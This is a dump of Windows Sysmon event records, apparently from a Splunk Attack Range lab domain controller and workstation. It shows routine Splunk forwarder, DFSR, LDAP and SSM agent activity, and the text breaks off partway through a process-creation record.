23542300x8000000000000000299623Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:53.433{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D94CD4DFD66496EFC9F8D8B1D1C99E3B,SHA256=4703496630F9094401DABDD6A4F9AA81D039A1904A215B64A850A8BB3BD25DF0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223520Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:50.581{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51790-false10.0.1.12-8000- 23542300x8000000000000000299622Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:53.370{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=927AE5D9E3E7D6190ADE03029AC261DA,SHA256=DD622A72CAFC8AB20F434EDBBE791FE79CD46C0E517E978C868B5C79720FBBD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223523Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:54.987{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEE2FA0B9A200FBCFAA51BB5AFB5AF0F,SHA256=80F86268B4FB9D61B5B23ED8F0C8FE82EB0F62648138B0B967845BF0B11FE50F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299625Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:52.593{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49631-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299624Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:54.470{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1C044E577314785D559B5FC8120586D,SHA256=27EDA983F33F15288E7A6E634FC9D1A39EEBF181CC34D435EACFC97777F205AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223522Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:54.754{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-171MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299626Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:55.470{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3478624432DD55BFED08709F2B570C8F,SHA256=000A174DB66234FF6FA49A40B88B852E5A3F9A7169D35807F9E454359A3B1F77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223524Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:55.754{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-172MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000299632Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:28:56.731{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\6FC0DF5C-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_6FC0DF5C-0000-0000-0000-100000000000.XML 13241300x8000000000000000299631Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:28:56.716{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Config SourceDWORD (0x00000001) 13241300x8000000000000000299630Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:28:56.716{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_BA30863B-E0B8-488B-829D-A0E9DE6AE59C.XML 10341000x8000000000000000299629Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:56.685{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299628Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:56.685{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299627Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:56.500{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC9DA9A31D624595B34D814B4E3F124B,SHA256=315FE58B597B5A8D59E6BD62C6A9BF30209E91BE729D773E7E154E0BCBC5987E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223525Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:56.002{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C664B7C91D36A5832F88C52CE6953C3,SHA256=F23D42153B5104A9D40D10560683D3290B77F17A1712DD9C40A0D45291D23138,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299636Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:57.568{C8EA50B7-F11D-6215-0B00-000000003802}6286484C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299635Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:57.568{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299634Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:57.568{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299633Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:57.515{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B81ADBBD06D65405E840D9F6FD9A3A5,SHA256=B0FB396EEA42C6B8E5B70648810EA40B150A2EC4CAE6F34F39AC4DF1112F7081,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223526Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:57.018{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFAD3C87E0C094FF84CD26FB93C09B83,SHA256=25FF684A7F1ABB44852B2AD647815C8C8F87EF4804AAD275B276F31C68F595FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299646Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:57.029{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49633-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000299645Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:57.029{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49633-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 10341000x8000000000000000299644Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:58.584{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299643Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:58.584{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299642Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:58.552{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C74DA10F8340671AB6214B1B9EC3CC5,SHA256=98C19B92939087E91DEB1A843EC47BD785121D7ABCA1AFD23E5AE6D225479CF5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223528Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:56.585{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51791-false10.0.1.12-8000- 23542300x8000000000000000223527Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:58.034{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAAB81DEDDB27AE9CDD18D6AB2B6959D,SHA256=B479FCB5F7EBFDC70666E52C22BE8B5D14C28CA6DCE08724E72166C772A715FC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299641Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:56.148{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49632-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 354300x8000000000000000299640Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:56.148{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49632-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 10341000x8000000000000000299639Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:58.399{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299638Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:58.399{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299637Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:58.399{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299649Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:59.583{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F2AC1FAAB24794CC0C452DB0F617658,SHA256=3153E879A079F4C65368C84095FECC3E376C3B4211091CB38C69D3BE47A3875F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223529Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:59.268{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37AD65FF894B436B640857DF7EA1CF7D,SHA256=08DE0150EAF4AD5D672CB578B5780BCDD8FF795031002F09C0F6DD763F75C31A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299648Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:57.860{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49634-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000299647Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:57.860{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49634-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000299651Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:00.600{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4E14961234A63555C3136FB05399BFB,SHA256=3D161EB95CF03F8EA3846F5834F153E4C103B5758980D3921667D84C027B5EFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223530Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:00.300{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2A3F3FA890E56D0788734FA1E33F64E,SHA256=C2B7B94B373F787C1B38B7F6D71E3EBADE4B7F4F4380E53BF52B7C4465F81830,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299650Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:58.544{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49635-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 154100x8000000000000000299661Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:01.990{C8EA50B7-1A7D-6216-8507-000000003802}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program 